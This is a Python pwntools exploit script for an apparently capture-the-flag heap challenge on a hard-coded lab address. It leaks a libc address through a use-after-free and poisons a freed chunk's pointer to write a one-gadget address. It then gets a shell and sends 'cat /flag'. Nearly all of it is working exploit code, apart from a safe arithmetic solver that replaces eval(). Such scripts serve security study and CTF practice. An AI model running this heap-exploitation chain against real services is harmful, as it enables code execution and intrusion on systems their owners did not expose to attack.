#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# expBy : @eastXueLian
# Debug : ./exp.py debug ./pwn -t -b b+0xabcd
# Remote: ./exp.py remote ./pwn ip:port
# NOTE: the two usage lines above are a template only — this script never reads
# its command-line arguments; the target is hard-coded in the io = remote(...) line below.
import ast
import operator

from pwn import *
# Target service.  NOTE(review): the usage header advertises a `remote ./pwn
# ip:port` / `debug` CLI, but argv is never read; the host and port live here
# (a private RFC 1918 lab address), so edit these two values to re-point the
# exploit.  The commented alternatives below are toggled by hand; the ELF path
# `./bflat` differs from the `./pwn` named in the header, presumably a leftover.
TARGET_HOST = "192.168.18.21"
TARGET_PORT = 9999
io = remote(TARGET_HOST, TARGET_PORT)
# io = process("./pwn")
# libc = ELF("./libc.so.6", checksec=False)
# elf = ELF("./bflat", checksec=False)
context.log_level = "info"
def ru(a, drop=False):
    """Receive from the connection up to and including delimiter `a`.

    Thin wrapper over ``io.recvuntil``; ``drop`` is forwarded positionally,
    so with ``drop=True`` the delimiter is stripped from the returned bytes.
    """
    received = io.recvuntil(a, drop)
    return received
def lg(s_name, s_val):
    """Log `<s_name> --> 0x<s_val>` in bold red on black (ANSI escapes).

    ``s_val`` goes through ``%x`` and therefore must be an integer; ``s_name``
    goes through ``%s``, so pass a str (a bytes value would print as b'...').
    Returns None.
    """
    print("\033[1;31;40m %s --> 0x%x \033[0m" % (s_name, s_val))


def rl(a=False):
    """recvline wrapper; `a` is forwarded as the first positional argument
    (pwntools' keepends flag — confirm against the installed version)."""
    return io.recvline(a)


def rn(x):
    """Receive exactly `x` bytes."""
    return io.recvn(x)


def s(x):
    """Send raw bytes, no newline appended."""
    return io.send(x)


def sl(x):
    """Send bytes followed by a newline."""
    return io.sendline(x)


def sa(a, b):
    """Wait for delimiter `a`, then send `b` raw."""
    return io.sendafter(a, b)


def sla(a, b):
    """Wait for delimiter `a`, then send `b` plus newline."""
    return io.sendlineafter(a, b)


def ia():
    """Hand the connection over to the terminal."""
    return io.interactive()


def dbg(text=None):
    """Attach gdb to the target, optionally running `text` as gdb commands."""
    return gdb.attach(io, text)


def i2b(c):
    """Render any value as its str() form encoded to bytes (e.g. 5 -> b'5')."""
    return str(c).encode()


def u32_ex(data):
    """Unpack up to 4 bytes as a little-endian u32, zero-padding short input."""
    padded = data.ljust(4, b"\x00")
    return u32(padded)


def u64_ex(data):
    """Unpack up to 8 bytes as a little-endian u64, zero-padding short input."""
    padded = data.ljust(8, b"\x00")
    return u64(padded)
def cmd(choice):
    """Pick a menu entry: wait for the `Your Choice:` prompt, then send
    `choice` as a decimal line."""
    sla(b"Your Choice: \n", i2b(choice))
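# Operators a challenge expression may contain.  Anything outside these two
# tables (names, calls, attribute access, subscripts, ...) is rejected, which
# is the whole point of not handing network-supplied bytes to eval().
_ARITH_BINOPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
    ast.Pow: operator.pow,
}
_ARITH_UNOPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def _solve_arith(expr):
    """Evaluate a plain arithmetic expression received from the service.

    Args:
        expr: the text that preceded ``= ?``, as bytes or str.  Surrounding
            whitespace is ignored; parentheses and unary +/- are accepted.

    Returns:
        The int/float result, identical to what ``eval`` yields for a
        pure-arithmetic expression (``/`` is true division).

    Raises:
        ValueError: the expression contains anything other than numeric
            literals and the operators listed in the tables above.
        SyntaxError: the text is not a parseable Python expression.
    """
    if isinstance(expr, bytes):
        expr = expr.decode()
    # eval() strips leading blanks itself; ast.parse does not, hence strip().
    tree = ast.parse(expr.strip(), mode="eval")

    def _fold(node):
        # bool is an int subclass; exclude it so only real numerals pass.
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _ARITH_BINOPS:
            return _ARITH_BINOPS[type(node.op)](_fold(node.left), _fold(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _ARITH_UNOPS:
            return _ARITH_UNOPS[type(node.op)](_fold(node.operand))
        raise ValueError("refusing non-arithmetic challenge: %r" % expr)

    return _fold(tree.body)


def win_gift():
    """Pass the 1000-round arithmetic "gift" gate behind menu option 666.

    Each round the service prints an expression ending in ``= ?``; the answer
    is sent back as a decimal line, with progress logged every 100 rounds.
    The expression is evaluated with ``_solve_arith`` instead of ``eval`` so a
    hostile or compromised endpoint cannot run code on the attacker's host.
    """
    cmd(666)
    ru(b"But,you have to win it by yourself\n")
    sl(i2b(1))
    for i in range(1000):
        challenge = ru(b"= ?", drop=True)
        sl(i2b(_solve_arith(challenge)))
        if i % 100 == 0:
            lg("i", i)  # was lg(b"i", i): %s on bytes printed b'i'
    ru(b"Now,you have earned your award!\n")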
def add(size, data):
    """Menu option 1: request `size` bytes, then send `data` raw (no newline
    is appended, so `data` must already be exactly what the service should
    store)."""
    cmd(1)
    sla(b"please tell me how much you want to have:\n", i2b(size))
    sa(b"Content:\n", data)
def delet(idx):
    """Menu option 2 (the script's delete primitive): send slot index `idx`."""
    cmd(2)
    sla(b"Please give me idx:\n", i2b(idx))
def edit(idx, data):
    """Menu option 3: select slot `idx`, then send `data` raw as its new
    contents (no newline appended)."""
    cmd(3)
    sla(b"Please give me idx:\n", i2b(idx))
    sa(b"What do you want?\n", data)
def show(idx):
    """Menu option 4: ask the service to print slot `idx`.  The response is
    not consumed here; the caller reads it from the connection."""
    cmd(4)
    sla(b"Please give me idx:\n", i2b(idx))
# ---- Exploit sequence -------------------------------------------------------
# NOTE(review): the three constants below are raw offsets into the target's
# libc and only hold for the build the author tested against; the commented
# ELF("./libc.so.6") line above suggests they were meant to be resolved from
# the real library (symbol lookup) rather than hard-coded.
LEAK_TO_LIBC_BASE = 0x1ECBE0
POISON_TARGET_OFF = 0x1E9000 - 0x80 * 15
GADGET_OFF = 0xE3AFE
CHUNK_SIZE = 0x90
NUM_CHUNKS = 8
FILL_QWORDS = 0x88 // 8

# Eight same-sized chunks (slots 0-7) plus one more (slot 8) that is never freed.
for _ in range(NUM_CHUNKS):
    add(CHUNK_SIZE, b"a")
add(CHUNK_SIZE, b"b")

# Free slots 0-7, then read slot 7 back: the first line after "info:" is
# treated as a libc pointer (presumably a heap-manager pointer left in the
# freed chunk — verify against the target libc).
for slot in range(NUM_CHUNKS):
    delet(slot)
show(7)
ru(b"info:\n")
leaked_ptr = u64_ex(ru(b"\n", drop=True))
libc_base = leaked_ptr - LEAK_TO_LIBC_BASE
lg("libc_base", libc_base)

# Overwrite freed slot 6 with a libc address and take one allocation.
edit(6, p64(libc_base + POISON_TARGET_OFF))
add(CHUNK_SIZE, b"a")
# add(CHUNK_SIZE, p64(0xDEADBEEF) * FILL_QWORDS)   # marker variant, kept from the original

# Clear the 1000-round arithmetic gate, fill the next allocation with the
# gadget address, choose option 5 and read the flag.
win_gift()
add(CHUNK_SIZE, p64(libc_base + GADGET_OFF) * FILL_QWORDS)
cmd(5)
sl(b"cat /flag")
ia()